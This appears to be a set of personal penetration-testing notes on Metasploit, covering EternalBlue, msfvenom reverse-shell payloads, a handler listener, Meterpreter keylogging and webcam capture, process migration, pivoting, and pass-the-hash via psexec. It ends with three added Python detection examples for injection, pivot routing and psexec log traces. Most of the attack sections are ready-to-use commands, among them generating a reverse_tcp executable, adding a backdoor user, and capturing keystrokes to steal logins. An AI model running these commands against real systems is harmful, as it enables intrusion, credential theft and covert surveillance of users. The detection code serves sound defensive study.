# Metasploit

## REF:

* [Windows CMD Kung Fu](https://pentest.mxhx.org/07-win-privesc/windows-cmd-kungfu)
* [Veil Evasion](https://pentest.mxhx.org/03-getting-in/03-veil)

## Metasploit Framework

```
msfsearch whatever

msfconsole
search Nostromo
use exploit/multi/http/nostromo_code_exec
show options

Module types:
exploit / payload / auxiliary / post
```

## Eternal Blue

```
ms17_010_eternalblue.rb
  .. EternalBlue - messy, kernel memory corruption, could crash the system
  .. get out of this as soon as you can and use psexec

ms17_010_psexec.rb   ..EternalBlue - friendly version
  .. sends a file, authenticates nicely, runs that file as a service
  .. Pentesters Pledge!!
```

## Venom

* [FtpHttpVulnWebshell](https://pentest.mxhx.org/ftp#ftphttp-vulnerability)

```
msfvenom -l | grep windows
msfvenom --list encoders
msfvenom --list formats
msfvenom --list payloads | grep java
msfvenom --help-formats

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.X.X LPORT=8080 -f exe > /tmp/file.exe

python3 -m http.server   ..share with python (optional)
```

* Silly Windows Powershell "Hello":
  * Create "hi.exe"
  * Opens Windows Powershell
  * Prints "Hello World"

```
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"Write-Output 'Hello World'\"; pause" -f exe > hi.exe
```

## Listener

```
> sudo msfconsole
show exploits

     excellent - never crashes the service (command injection, SQLi, file inclusion style bugs)
     great     - has a default target and auto-detects the right target/version
     good      - has a default target that is the common case for that software
     average   - generally unreliable or hard to exploit
     low       - nearly impossible, or under 50% success on common platforms
     manual    - unstable, basically a DoS, or needs manual configuration

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp  ..same as venom

show options
set LPORT 8080      ..same as venom/incoming
set LHOST 0.0.0.0   ..any
exploit -j          ..job to background
```

## Sessions

```
Ctrl-C         ..kill the session you are in
jobs           ..jobs listening

sessions -h    ..help
sessions -K    ..kill all sessions
sessions -l    ..list
sessions -i 1  ..interact
```

## Shell

```
(no autocomplete)

whoami
netstat -na
tasklist
cd c:\
dir
ipconfig
ipconfig /displaydns
net user
net user bob Password1 /add
```

## PrivEsc

```
getuid    .. www
use priv  .. loading privesc
getsystem .. grab system acct
getuid    .. system
```

## Meterpreter

```
?        ..help
cd       ..change dir
lcd      ..local cd
pwd   
ls
cat
download
mkdir
edit     ..don't trust this though

sysinfo
shutdown
reboot
reg      ..registry
shell    ..go to the 'normal shell'
exit

kill
execute

screenshot -p my.jpg
screenshot -p /tmp/screen.jpg
idletime
uictl [enable/disable] [keyboard/mouse]
webcam_list
webcam_snap
record_mic

keyscan_start  ..keylogging
keyscan_dump   ..view
keyscan_stop
(Could force putty to crash, and capture their login!)
```

## Migrate

```
getuid         ..userid
getpid         ..2952

ps             ..process list
ps -h          ..process list (help)
ps -S notepad  ..search for notepad
migrate 3996   ..migrate into notepad
getpid         ..3996
```
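What `migrate` does to the target is inject the Meterpreter code into another process and start a thread there, which is exactly what Sysmon Event ID 8 (CreateRemoteThread) records. The following is an added example, not part of these notes or of Metasploit: a small detection over constructed Sysmon-style records. The field names follow Sysmon's Event 8 schema; the sample values, the PIDs (reusing the 2952/3996 numbers from the notes) and the "user-writable path" heuristic are assumptions made for the demo.

```python
import re

# Constructed Sysmon Event ID 8 records, flattened to key=value pairs (not real telemetry).
# Record 1 mimics a migrate from a dropped exe into notepad: the new thread starts at an
# address that no loaded module backs (StartModule is empty).
# Record 2 is a benign-looking remote thread whose start address lives inside ntdll.dll.
SAMPLE_SYSMON = [
    "EventID=8 SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\file.exe SourcePid=2952 "
    "TargetImage=C:\\Windows\\System32\\notepad.exe TargetPid=3996 "
    "StartAddress=0x00000000025C0000 StartModule= StartFunction=",
    "EventID=8 SourceImage=C:\\Windows\\System32\\svchost.exe SourcePid=612 "
    "TargetImage=C:\\Windows\\explorer.exe TargetPid=1808 "
    "StartAddress=0x00007FFB1C2E12A0 StartModule=C:\\Windows\\System32\\ntdll.dll "
    "StartFunction=EtwpNotificationThread",
]

# Heuristic (assumption for the demo): processes launched from these locations are
# not where legitimate injectors normally live.
USER_WRITABLE = re.compile(r"^(C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp\\)", re.I)


def parse_sysmon(line):
    """Turn 'Key=Value Key2=Value2' into a dict; empty values are kept as ''."""
    return dict(re.findall(r"(\w+)=(\S*)", line))


def remote_thread_reasons(ev):
    """Return the list of reasons an Event 8 record looks like code injection."""
    reasons = []
    if ev.get("StartModule", "") == "":
        reasons.append("thread start address not backed by a loaded module")
    if USER_WRITABLE.match(ev.get("SourceImage", "")):
        reasons.append("source process runs from a user-writable path")
    return reasons


def find_suspicious_remote_threads(lines):
    """Filter Event 8 records and keep those with at least one reason."""
    findings = []
    for line in lines:
        ev = parse_sysmon(line)
        if ev.get("EventID") != "8":
            continue
        reasons = remote_thread_reasons(ev)
        if reasons:
            findings.append({
                "source": ev["SourceImage"],
                "target": ev["TargetImage"],
                "target_pid": int(ev["TargetPid"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_remote_threads(SAMPLE_SYSMON):
        print(f"{f['source']} -> {f['target']} (pid {f['target_pid']})")
        for r in f["reasons"]:
            print("   -", r)
```

An empty `StartModule` is the strongest single signal here, because a thread started by `migrate` begins in memory the injector allocated rather than in any DLL; the path check only adds weight and will miss injectors that run from system directories.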

## Looking Around

```
meterpreter > run post/windows/gather/win_privs
C:\> cd \ & dir /b /s proof.txt
C:\> type c:\pathto\proof.txt
```

## Pivot

```
use exploit1
set RHOST victim1
set PAYLOAD xyz
exploit
mtp> ctrl-z or background
msf> route add victim2subnet netmask sid
use exploit2
set RHOST victim2
set PAYLOAD xyz
exploit

Did not try this one:
MTP> portfwd add -l 5555 -p 22 -r Target2
```
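The `route add victim2subnet netmask sid` line is what makes the pivot work: msfconsole keeps a table that maps subnets to the session that can reach them, and when a second exploit targets victim2 the framework sends its traffic through that session. The following is an added example, not code from these notes or from Metasploit, that models that route table in Python so the lookup rule is visible; the subnets and session ids are constructed for the demo.

```python
import ipaddress

# Added example (not Metasploit code): a tiny model of the msfconsole route table
# used for pivoting. `route add <subnet> <netmask> <session id>` tells the framework
# which compromised host's session should carry traffic for a subnet; a lookup uses
# longest-prefix match, so the most specific route wins.


class PivotRouteTable:
    def __init__(self):
        self.routes = []  # list of (ip_network, session_id)

    def add(self, subnet, netmask, sid):
        """Mirror of `route add 10.1.1.0 255.255.255.0 1`."""
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        self.routes.append((net, sid))

    def delete(self, subnet, netmask, sid):
        """Mirror of `route del ...`; returns True if a route was removed."""
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        before = len(self.routes)
        self.routes = [r for r in self.routes if r != (net, sid)]
        return len(self.routes) != before

    def lookup(self, dst):
        """Session that would carry traffic to `dst`, or None if no pivot applies."""
        addr = ipaddress.ip_address(dst)
        matches = [(net, sid) for net, sid in self.routes if addr in net]
        if not matches:
            return None
        # longest prefix (most specific subnet) wins, as in a real routing table
        return max(matches, key=lambda m: m[0].prefixlen)[1]

    def print_table(self):
        """Rough equivalent of `route print`."""
        print("Subnet              Netmask           Session")
        for net, sid in self.routes:
            print(f"{str(net.network_address):<20}{str(net.netmask):<18}{sid}")


def demo():
    """Constructed scenario: session 1 (victim1) reaches 10.1.1.0/24, and a later
    session 2 reaches a smaller subnet inside it."""
    rt = PivotRouteTable()
    rt.add("10.1.1.0", "255.255.255.0", 1)
    rt.add("10.1.1.128", "255.255.255.128", 2)
    rt.print_table()
    return rt


if __name__ == "__main__":
    table = demo()
    for dst in ("10.1.1.5", "10.1.1.200", "192.168.0.1"):
        print(dst, "->", table.lookup(dst))
```

From a defender's side the same model explains what to look for: the pivot host suddenly originates connections to subnets it never talked to before, because every route entry turns one compromised machine into a gateway.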

## Pass the Hash

* Pass the hash to Metasploit
* Must come from: system, RAM, SAM db, ntds.dit
* Not sniffed from the network (different salts)
* Note: after a 2014 patch, local accounts are now disabled over the network

```
msfconsole
msf> use exploit/windows/smb/psexec
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOSTS 10.10.10.10
msf> set LHOST 10.10.x.x
msf> set smbuser monk
msf> set smbpass LMHASHXXX:NTHASHXXX
msf> exploit       ..error: Exploit failed ActiveRecord
msf> db_disconnect ..fix the bug in metasploit
msf> exploit       ..win!

getuid
getpid
ifconfig
shell
net user
net user bob Password1 /add
```
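Both the psexec run in the Eternal Blue section ("sends a file, authenticates nicely, runs that file as a service") and the pass-the-hash run above leave the same trail on the target: a network NTLM logon, a freshly installed service whose binary did not exist a moment earlier, and here a `net user ... /add`. The following is an added example, not part of these notes or of Metasploit, that correlates those three events over constructed Windows log lines. The `key=value` layout, the host names, IPs and timestamps are made up for the demo, and the "8 random letters under %SYSTEMROOT%" pattern is a heuristic assumption for a psexec-style service, not a signature taken from the framework.

```python
import re
from datetime import datetime, timedelta

# Constructed sample (not real telemetry): Security and System log events flattened to
# key=value pairs. 4624 = logon, 7045 = service installed, 4720 = user account created.
# WS01 shows the psexec-style chain; WS02 is a console logon plus a vendor installer.
SAMPLE_EVENTS = """\
ts=2024-05-01T10:00:01 id=4624 host=WS01 logon_type=3 auth=NTLM user=monk src_ip=10.10.14.5
ts=2024-05-01T10:00:02 id=7045 host=WS01 service=QhXbNvLk image=%SYSTEMROOT%\\QhXbNvLk.exe start=demand
ts=2024-05-01T10:00:09 id=4720 host=WS01 user=bob actor=SYSTEM
ts=2024-05-01T10:30:00 id=4624 host=WS02 logon_type=2 auth=Kerberos user=alice src_ip=-
ts=2024-05-01T10:31:00 id=7045 host=WS02 service=VendorUpdate image=C:\\ProgramData\\Vendor\\updater.exe start=auto
"""

# Heuristics (assumptions for the demo): a service named with 8 random letters whose
# binary sits directly under %SYSTEMROOT% is how a psexec-style upload tends to look.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
SYSROOT_EXE = re.compile(r"^%SYSTEMROOT%\\[A-Za-z]{8}\.exe$", re.I)


def parse_event(line):
    """Parse one key=value line; ts becomes a datetime and id an int."""
    ev = dict(re.findall(r"(\w+)=(\S+)", line))
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["id"] = int(ev["id"])
    return ev


def parse_log(text):
    return [parse_event(l) for l in text.splitlines() if l.strip()]


def find_psexec_chains(events, window=timedelta(seconds=60)):
    """For each network (type 3) NTLM logon, collect suspicious service installs and
    account creations on the same host within `window`; return one finding per logon."""
    findings = []
    for logon in events:
        if not (logon["id"] == 4624 and logon.get("logon_type") == "3"
                and logon.get("auth") == "NTLM"):
            continue
        deadline = logon["ts"] + window
        later = [e for e in events
                 if e["host"] == logon["host"] and logon["ts"] <= e["ts"] <= deadline]
        indicators = []
        for e in later:
            if (e["id"] == 7045 and RANDOM_NAME.match(e["service"])
                    and SYSROOT_EXE.match(e["image"])):
                indicators.append(("service_install", e["service"]))
            elif e["id"] == 4720:
                indicators.append(("account_created", e["user"]))
        if indicators:
            findings.append({"host": logon["host"], "user": logon["user"],
                             "src_ip": logon["src_ip"], "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in find_psexec_chains(parse_log(SAMPLE_EVENTS)):
        print(f"{f['host']}: NTLM network logon as {f['user']} from {f['src_ip']}")
        for kind, detail in f["indicators"]:
            print(f"   - {kind}: {detail}")
```

The logon event alone is noise on any file server; the value is in the join. A 7045 with a throwaway name right after a network NTLM logon is worth an alert on its own, and a 4720 from SYSTEM in the same minute is the `net user /add` from the shell above showing up in the log.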

